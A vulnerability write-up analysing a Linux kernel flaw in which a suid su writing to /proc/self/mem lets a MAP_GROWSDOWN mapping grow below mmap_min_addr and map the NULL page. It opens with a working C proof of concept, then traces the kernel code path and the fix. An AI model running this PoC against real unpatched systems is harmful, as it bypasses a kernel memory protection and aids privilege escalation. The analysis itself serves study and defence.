After reading quite a few articles about this vulnerability, here is my own write-up.

Reference: https://cert.360.cn/report/detail?id=58e8387ec4c79693354d4797871536ea

PoC

#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>

int main(void) {
        /* Anchor a one-page, writable MAP_GROWSDOWN mapping at 0x10000. */
        void *map = mmap((void*)0x10000, 0x1000, PROT_READ|PROT_WRITE,
                         MAP_PRIVATE|MAP_ANONYMOUS|MAP_GROWSDOWN|MAP_FIXED, -1, 0);
        if (map == MAP_FAILED) err(1, "mmap");
        int fd = open("/proc/self/mem", O_RDWR);
        if (fd == -1) err(1, "open");
        unsigned long addr = (unsigned long)map;
        while (addr != 0) {
                addr -= 0x1000;
                /* The file offset of /proc/self/mem is the target virtual
                 * address of the next write. */
                if (lseek(fd, addr, SEEK_SET) == -1) err(1, "lseek");
                char cmd[1000];
                /* Let the suid-root su perform the write: its stdout is our
                 * /proc/self/mem fd, so the expansion check runs with root
                 * credentials. */
                sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
                system(cmd);
        }
        system("head -n1 /proc/$PPID/maps");
        printf("data at NULL: 0x%lx\n", *(unsigned long *)0);
}

The PoC first mmaps one page of memory at address 0x10000, then opens /proc/self/mem. This file exposes the current process's memory: an offset into the file corresponds to a virtual address in the process.
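
As an aside, this offset-equals-address behaviour is easy to verify on its own, without any vulnerability. A minimal sketch (my own illustrative example, not part of the original PoC):

#define _FILE_OFFSET_BITS 64   /* so off_t can hold 64-bit addresses */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
        char secret[] = "hello";
        char buf[sizeof(secret)];
        int fd = open("/proc/self/mem", O_RDONLY);
        if (fd == -1) { perror("open"); return 1; }
        /* The file offset is a virtual address: pread at &secret[0]
         * returns the bytes mapped there. */
        if (pread(fd, buf, sizeof(buf), (off_t)(unsigned long)secret) != sizeof(buf)) {
                perror("pread");
                return 1;
        }
        printf("read back via /proc/self/mem: %s\n", buf); /* prints "hello" */
        close(fd);
        return 0;
}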

It then enters a while loop and uses the vulnerability to claim memory one page at a time, moving downwards, until everything from 0 to 0x11000 is mapped.

Tracing the code

The file operations for /proc/<pid>/mem, including the write handler, are defined here:

static const struct file_operations proc_mem_operations = {
	.llseek		= mem_lseek,
	.read		= mem_read,
	.write		= mem_write,
	.open		= mem_open,
	.release	= mem_release,
};

Looking straight at mem_write:

static ssize_t mem_write(struct file *file, const char __user *buf,
			 size_t count, loff_t *ppos)
{
	return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

static ssize_t mem_rw(struct file *file, char __user *buf,
			size_t count, loff_t *ppos, int write)
{
	struct mm_struct *mm = file->private_data;
	unsigned long addr = *ppos;
	ssize_t copied;
	char *page;
	unsigned int flags;

	if (!mm)
		return 0;

	page = (char *)__get_free_page(GFP_TEMPORARY);
	if (!page)
		return -ENOMEM;

	copied = 0;
	if (!atomic_inc_not_zero(&mm->mm_users))
		goto free;

	/* Maybe we should limit FOLL_FORCE to actual ptrace users? */
	flags = FOLL_FORCE;
	if (write)
		flags |= FOLL_WRITE;

	while (count > 0) {
		int this_len = min_t(int, count, PAGE_SIZE);

		/* Step 1: copy from the user buffer into the kernel bounce page. */
		if (write && copy_from_user(page, buf, this_len)) {
			copied = -EFAULT;
			break;
		}

		/* Step 2: write the bounce page into the target mm; addr is the
		 * addr from our PoC, this_len the size of our input. */
		this_len = access_remote_vm(mm, addr, page, this_len, flags);
		if (!this_len) {
			if (!copied)
				copied = -EIO;
			break;
		}

		if (!write && copy_to_user(buf, page, this_len)) {
			copied = -EFAULT;
			break;
		}

		buf += this_len;
		addr += this_len;
		copied += this_len;
		count -= this_len;
	}
	*ppos = addr;

	mmput(mm);
free:
	free_page((unsigned long) page);
	return copied;
}

A write to the file boils down to the two steps marked in the comments above: first copy the data from the user buffer into a kernel bounce page, then write that page's contents into the other process's memory.
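
This cross-process path can also be driven from user space. Below is a minimal sketch of my own (not from the original write-up), assuming the default ptrace policy lets a parent access its stopped child; the pwrite ends up in mem_write -> mem_rw -> access_remote_vm exactly as described above:

#define _GNU_SOURCE
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static volatile char msg[16] = "unpatched";

int main(void) {
        pid_t pid = fork();
        if (pid == 0) {                  /* child */
                raise(SIGSTOP);          /* park until the parent has written */
                printf("child sees: %s\n", (char *)msg);
                return 0;
        }
        waitpid(pid, NULL, WUNTRACED);   /* wait for the child to stop */
        char path[64];
        snprintf(path, sizeof(path), "/proc/%d/mem", pid);
        int fd = open(path, O_RDWR);
        if (fd == -1) { perror("open"); return 1; }
        /* File offset == virtual address in the child's address space. */
        if (pwrite(fd, "patched", 8, (off_t)(unsigned long)msg) != 8)
                perror("pwrite");
        close(fd);
        kill(pid, SIGCONT);
        waitpid(pid, NULL, 0);           /* child now prints "patched" */
        return 0;
}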

/**
 * access_remote_vm - access another process' address space
 * @mm:		the mm_struct of the target address space
 * @addr:	start address to access
 * @buf:	source or destination buffer
 * @len:	number of bytes to transfer
 * @gup_flags:	flags modifying lookup behaviour
 *
 * The caller must hold a reference on @mm.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
		void *buf, int len, unsigned int gup_flags)
{
	return __access_remote_vm(NULL, mm, addr, buf, len, gup_flags);
}

/*
 * Access another process' address space as given in mm. If non-NULL, use the
 * given task for page fault accounting.
 */
int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long addr, void *buf, int len, unsigned int gup_flags)
{
	struct vm_area_struct *vma;
	void *old_buf = buf;
	int write = gup_flags & FOLL_WRITE;

	down_read(&mm->mmap_sem);
	/* ignore errors, just check how much was successfully transferred */
	while (len) {
		int bytes, ret, offset;
		void *maddr;
		struct page *page = NULL;

		/* Pin one page of the target process starting at addr and
		 * store its struct page pointer into &page. */
		ret = get_user_pages_remote(tsk, mm, addr, 1,
				gup_flags, &page, &vma, NULL);
		if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
			break;
#else
			/*
			 * Check if this is a VM_IO | VM_PFNMAP VMA, which
			 * we can access using slightly different code.
			 */
			vma = find_vma(mm, addr);
			if (!vma || vma->vm_start > addr)
				break;
			if (vma->vm_ops && vma->vm_ops->access)
				ret = vma->vm_ops->access(vma, addr, buf,
							  len, write);
			if (ret <= 0)
				break;
			bytes = ret;
#endif
		} else {
			bytes = len;
			offset = addr & (PAGE_SIZE-1);
			if (bytes > PAGE_SIZE-offset)
				bytes = PAGE_SIZE-offset;

			maddr = kmap(page); /* map the pinned page into the kernel */
			if (write) {
				/* effectively memcpy(maddr + offset, buf, bytes) */
				copy_to_user_page(vma, page, addr,
						  maddr + offset, buf, bytes);
				set_page_dirty_lock(page);
			} else {
				copy_from_user_page(vma, page, addr,
						    buf, maddr + offset, bytes);
			}
			kunmap(page);
			put_page(page);
		}
		len -= bytes;
		buf += bytes;
		addr += bytes;
	}
	up_read(&mm->mmap_sem);

	return buf - old_buf;
}

The key point after that is get_user_pages_remote: only once this function has successfully pinned the target page can kmap map it into the kernel and the copy proceed.

long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *locked)
{
	return __get_user_pages_locked(tsk, mm, start, nr_pages, pages, vmas,
				       locked, true,
				       gup_flags | FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);

static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
						struct mm_struct *mm,
						unsigned long start,
						unsigned long nr_pages,
						struct page **pages,
						struct vm_area_struct **vmas,
						int *locked, bool notify_drop,
						unsigned int flags)
{
	long ret, pages_done;
	bool lock_dropped;

	if (locked) {
		/* if VM_FAULT_RETRY can be returned, vmas become invalid */
		BUG_ON(vmas);
		/* check caller initialized locked */
		BUG_ON(*locked != 1);
	}

	if (pages)
		flags |= FOLL_GET;

	pages_done = 0;
	lock_dropped = false;
	for (;;) {
		/* Pin nr_pages pages of the target mm starting at start and
		 * store their struct page pointers into pages; returns how
		 * many were pinned. */
		ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
				       vmas, locked);
		if (!locked)
			/* VM_FAULT_RETRY couldn't trigger, bypass */
			return ret;

		/* VM_FAULT_RETRY cannot return errors */
		if (!*locked) {
			BUG_ON(ret < 0);
			BUG_ON(ret >= nr_pages);
		}

		if (!pages)
			/* If it's a prefault don't insist harder */
			return ret;

		if (ret > 0) {
			nr_pages -= ret;
			pages_done += ret;
			if (!nr_pages)
				break;
		}
		if (*locked) {
			/* VM_FAULT_RETRY didn't trigger */
			if (!pages_done)
				pages_done = ret;
			break;
		}
		/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
		pages += ret;
		start += ret << PAGE_SHIFT;

		/*
		 * Repeat on the address that fired VM_FAULT_RETRY
		 * without FAULT_FLAG_ALLOW_RETRY but with
		 * FAULT_FLAG_TRIED.
		 */
		*locked = 1;
		lock_dropped = true;
		down_read(&mm->mmap_sem);
		ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
				       pages, NULL, NULL);
		if (ret != 1) {
			BUG_ON(ret > 1);
			if (!pages_done)
				pages_done = ret;
			break;
		}
		nr_pages--;
		pages_done++;
		if (!nr_pages)
			break;
		pages++;
		start += PAGE_SIZE;
	}
	if (notify_drop && lock_dropped && *locked) {
		/*
		 * We must let the caller know we temporarily dropped the lock
		 * and so the critical section protected by it was lost.
		 */
		up_read(&mm->mmap_sem);
		*locked = 0;
	}
	return pages_done;
}

Why is __get_user_pages called twice here? The second call handles VM_FAULT_RETRY: the first call may drop mmap_sem while a page fault sleeps (reported back through *locked becoming 0), so the loop retakes the lock and retries just the faulting page with FOLL_TRIED before carrying on with the remaining pages.

static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *nonblocking)
{
	long i = 0;
	unsigned int page_mask;
	struct vm_area_struct *vma = NULL;

	if (!nr_pages)
		return 0;

	VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

	/*
	 * If FOLL_FORCE is set then do not force a full fault as the hinting
	 * fault information is unrelated to the reference behaviour of a task
	 * using the address space
	 */
	if (!(gup_flags & FOLL_FORCE))
		gup_flags |= FOLL_NUMA;

	do {
		struct page *page;
		unsigned int foll_flags = gup_flags;
		unsigned int page_increm;

		/* first iteration or cross vma bound */
		if (!vma || start >= vma->vm_end) {
			vma = find_extend_vma(mm, start); /* look up (and possibly extend) the vma */
			if (!vma && in_gate_area(mm, start)) {
				int ret;
				ret = get_gate_page(mm, start & PAGE_MASK,
						gup_flags, &vma,
						pages ? &pages[i] : NULL);
				if (ret)
					return i ? : ret;
				page_mask = 0;
				goto next_page;
			}

			if (!vma || check_vma_flags(vma, gup_flags))
				return i ? : -EFAULT;
			if (is_vm_hugetlb_page(vma)) {
				i = follow_hugetlb_page(mm, vma, pages, vmas,
						&start, &nr_pages, i,
						gup_flags);
				continue;
			}
		}
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory.
		 */
		if (unlikely(fatal_signal_pending(current)))
			return i ? i : -ERESTARTSYS;
		cond_resched();
		page = follow_page_mask(vma, start, foll_flags, &page_mask); /* look up the page descriptor for user address start */
		if (!page) {
			int ret;
			ret = faultin_page(tsk, vma, start, &foll_flags,
					nonblocking);
			switch (ret) {
			case 0:
				goto retry;
			case -EFAULT:
			case -ENOMEM:
			case -EHWPOISON:
				return i ? i : ret;
			case -EBUSY:
				return i;
			case -ENOENT:
				goto next_page;
			}
			BUG();
		} else if (PTR_ERR(page) == -EEXIST) {
			/*
			 * Proper page table entry exists, but no corresponding
			 * struct page.
			 */
			goto next_page;
		} else if (IS_ERR(page)) {
			return i ? i : PTR_ERR(page);
		}
		if (pages) {
			pages[i] = page;
			flush_anon_page(vma, page, start);
			flush_dcache_page(page);
			page_mask = 0;
		}
next_page:
		if (vmas) {
			vmas[i] = vma;
			page_mask = 0;
		}
		page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
		if (page_increm > nr_pages)
			page_increm = nr_pages;
		i += page_increm;
		start += page_increm * PAGE_SIZE;
		nr_pages -= page_increm;
	} while (nr_pages);
	return i;
}

The find_extend_vma function looks up the vma for a given address.

Depending on whether CONFIG_STACK_GROWSUP is defined, one of two different find_extend_vma implementations is compiled in.

The one relevant here is the variant for kernels without CONFIG_STACK_GROWSUP, i.e. for stacks that grow downwards.

struct vm_area_struct *
find_extend_vma(struct mm_struct *mm, unsigned long addr)
{
	struct vm_area_struct *vma;
	unsigned long start;

	addr &= PAGE_MASK;
	vma = find_vma(mm, addr); /* find the vma for addr */
	if (!vma)
		return NULL;
	if (vma->vm_start <= addr)
		return vma;
	if (!(vma->vm_flags & VM_GROWSDOWN))
		return NULL;
	start = vma->vm_start;
	/* We get here because addr is not inside any existing vma,
	 * so the (GROWSDOWN) vma has to be extended down to it. */
	if (expand_stack(vma, addr))
		return NULL;
	if (vma->vm_flags & VM_LOCKED)
		populate_vma_page_range(vma, addr, start, NULL);
	return vma;
}

int expand_stack(struct vm_area_struct *vma, unsigned long address)
{
	struct vm_area_struct *prev;

	address &= PAGE_MASK;
	prev = vma->vm_prev;
	if (prev && prev->vm_end == address) {
		if (!(prev->vm_flags & VM_GROWSDOWN))
			return -ENOMEM;
	}
	return expand_downwards(vma, address); /* the function that matters here */
}

int expand_downwards(struct vm_area_struct *vma,
				   unsigned long address)
{
	struct mm_struct *mm = vma->vm_mm;
	int error;

	address &= PAGE_MASK;
	error = security_mmap_addr(address); /* the vulnerability is in here */
	if (error)
		return error;

	/* We must make sure the anon_vma is allocated. */
	if (unlikely(anon_vma_prepare(vma)))
		return -ENOMEM;

	/*
	 * vma->vm_start/vm_end cannot change under us because the caller
	 * is required to hold the mmap_sem in read mode. We need the
	 * anon_vma lock to serialize against concurrent expand_stacks.
	 */
	anon_vma_lock_write(vma->anon_vma);

	/* Somebody else might have raced and expanded it already */
	if (address < vma->vm_start) {
		unsigned long size, grow;

		size = vma->vm_end - address;
		grow = (vma->vm_start - address) >> PAGE_SHIFT;

		error = -ENOMEM;
		if (grow <= vma->vm_pgoff) {
			error = acct_stack_growth(vma, size, grow);
			if (!error) {
				/*
				 * vma_gap_update() doesn't support concurrent
				 * updates, but we only hold a shared mmap_sem
				 * lock here, so we need to protect against
				 * concurrent vma expansions.
				 * anon_vma_lock_write() doesn't help here, as
				 * we don't guarantee that all growable vmas
				 * in a mm share the same root anon vma.
				 * So, we reuse mm->page_table_lock to guard
				 * against concurrent vma expansions.
				 */
				spin_lock(&mm->page_table_lock);
				if (vma->vm_flags & VM_LOCKED)
					mm->locked_vm += grow;
				vm_stat_account(mm, vma->vm_flags, grow);
				anon_vma_interval_tree_pre_update_vma(vma);
				vma->vm_start = address;
				vma->vm_pgoff -= grow;
				anon_vma_interval_tree_post_update_vma(vma);
				vma_gap_update(vma);
				spin_unlock(&mm->page_table_lock);

				perf_event_mmap(vma);
			}
		}
	}
	anon_vma_unlock_write(vma->anon_vma);
	khugepaged_enter_vma_merge(vma, vma->vm_flags);
	validate_mm(mm);
	return error;
}
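
One detail worth working through is the grow <= vma->vm_pgoff check. For a private anonymous mapping, do_mmap sets vm_pgoff = addr >> PAGE_SHIFT (as far as I can tell), so the PoC's vma anchored at 0x10000 starts out with vm_pgoff = 0x10 = 16. Each iteration of the PoC loop expands the vma down by one page: grow = 1, the check passes, vm_start drops by 0x1000 and vm_pgoff drops by 1. After 16 iterations vm_start = 0 and vm_pgoff = 0, i.e. anchoring at 0x10000 leaves exactly enough headroom to grow all the way down to the NULL page.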

The vulnerability lies in security_mmap_addr:

static inline int security_mmap_addr(unsigned long addr)
{
	return cap_mmap_addr(addr); /* validity check: may this addr be mmapped? */
}

int cap_mmap_addr(unsigned long addr)
{
	int ret = 0;

	if (addr < dac_mmap_min_addr) {
		/* Does the task hold CAP_SYS_RAWIO in its effective set,
		 * i.e. is it privileged enough for a low mapping? */
		ret = cap_capable(current_cred(), &init_user_ns, CAP_SYS_RAWIO,
				  SECURITY_CAP_AUDIT);
		/* set PF_SUPERPRIV if it turns out we allow the low mmap */
		if (ret == 0)
			current->flags |= PF_SUPERPRIV;
	}
	return ret;
}

When the PoC runs, su is a suid binary, so while it executes its effective credentials are those of its owner, root. current_cred() therefore returns root's cred, and the CAP_SYS_RAWIO check is guaranteed to pass. (dac_mmap_min_addr comes from the vm.mmap_min_addr sysctl, which is 65536 = 0x10000 on many distros, and is also why the PoC anchors its mapping exactly at 0x10000.)

Once this check passes, the memory we asked for below the minimum address is handed out without complaint.

So the attack is: in our own process we first set the file position of /proc/self/mem to an address that would be illegal for an ordinary user, e.g. 0x9000, and then let su's output perform the write to that descriptor. Running in root's context, the write passes every check, the GROWSDOWN vma is expanded, and these low addresses end up mapped. It feels like a page being allocated after a page fault, but it is really the vma itself being grown downwards.
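
For reference, this bug appears to be CVE-2019-9213. As far as I can tell, the upstream fix removes the capability-based escape hatch from expand_downwards and unconditionally refuses to grow a vma below mmap_min_addr, roughly like this (a paraphrased sketch, not the verbatim patch):

int expand_downwards(struct vm_area_struct *vma, unsigned long address)
{
	struct mm_struct *mm = vma->vm_mm;
	int error = 0;

	address &= PAGE_MASK;
	/* No security_mmap_addr() call any more: even a task holding
	 * CAP_SYS_RAWIO (e.g. a suid-root su) can no longer grow a
	 * GROWSDOWN vma below mmap_min_addr. */
	if (address < mmap_min_addr)
		return -EPERM;

	/* ... rest of the function as before ... */
}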

vma

vma is short for Virtual Memory Area.

struct vm_area_struct {
	/* The first cache line has the info for VMA tree walking. */

	unsigned long vm_start;		/* Our start address within vm_mm. */
	unsigned long vm_end;		/* The first byte after our end address
					   within vm_mm. */

	/* linked list of VM areas per task, sorted by address */
	struct vm_area_struct *vm_next, *vm_prev;

	struct rb_node vm_rb;

	/*
	 * Largest free memory gap in bytes to the left of this VMA.
	 * Either between this VMA and vma->vm_prev, or between one of the
	 * VMAs below us in the VMA rbtree and its ->vm_prev. This helps
	 * get_unmapped_area find a free area of the right size.
	 */
	unsigned long rb_subtree_gap;

	/* Second cache line starts here. */

	struct mm_struct *vm_mm;	/* The address space we belong to. */
	pgprot_t vm_page_prot;		/* Access permissions of this VMA. */
	unsigned long vm_flags;		/* Flags, see mm.h. */

	/*
	 * For areas with an address space and backing store,
	 * linkage into the address_space->i_mmap interval tree.
	 */
	struct {
		struct rb_node rb;
		unsigned long rb_subtree_last;
	} shared;

	/*
	 * A file's MAP_PRIVATE vma can be in both i_mmap tree and anon_vma
	 * list, after a COW of one of the file pages. A MAP_SHARED vma
	 * can only be in the i_mmap tree. An anonymous MAP_PRIVATE, stack
	 * or brk vma (with NULL file) can only be in an anon_vma list.
	 */
	struct list_head anon_vma_chain; /* Serialized by mmap_sem &
					  * page_table_lock */
	struct anon_vma *anon_vma;	/* Serialized by page_table_lock */

	/* Function pointers to deal with this struct. */
	const struct vm_operations_struct *vm_ops;

	/* Information about our backing store: */
	unsigned long vm_pgoff;		/* Offset (within vm_file) in PAGE_SIZE
					   units */
	struct file * vm_file;		/* File we map to (can be NULL). */
	void * vm_private_data;		/* was vm_pte (shared mem) */

#ifndef CONFIG_MMU
	struct vm_region *vm_region;	/* NOMMU mapping region */
#endif
#ifdef CONFIG_NUMA
	struct mempolicy *vm_policy;	/* NUMA policy for the VMA */
#endif
	struct vm_userfaultfd_ctx vm_userfaultfd_ctx;
};

This struct defines a memory VMM memory area. There is one of these per VM-area/task. A VM area is any part of the process virtual memory space that has a special rule for the page-fault handlers (ie a shared library, the executable area etc).
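
To tie this back to the PoC: each line of /proc/<pid>/maps is rendered from one of these structs. If I read the format correctly, a line such as

00010000-00011000 rw-p 00010000 00:00 0

corresponds to vm_start = 0x10000, vm_end = 0x11000 and vm_pgoff = 0x10 (the third column is the offset in bytes). Once the exploit has run, the first line should begin at 00000000 instead, which is exactly what head -n1 /proc/$PPID/maps in the PoC checks.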

Summary

The root cause of this vulnerability is not complicated: it is an issue triggered through suid programs. Tracing it through the kernel was still fairly hard, because my grasp of structures like vma and mm was not deep enough, which made the analysis slow going.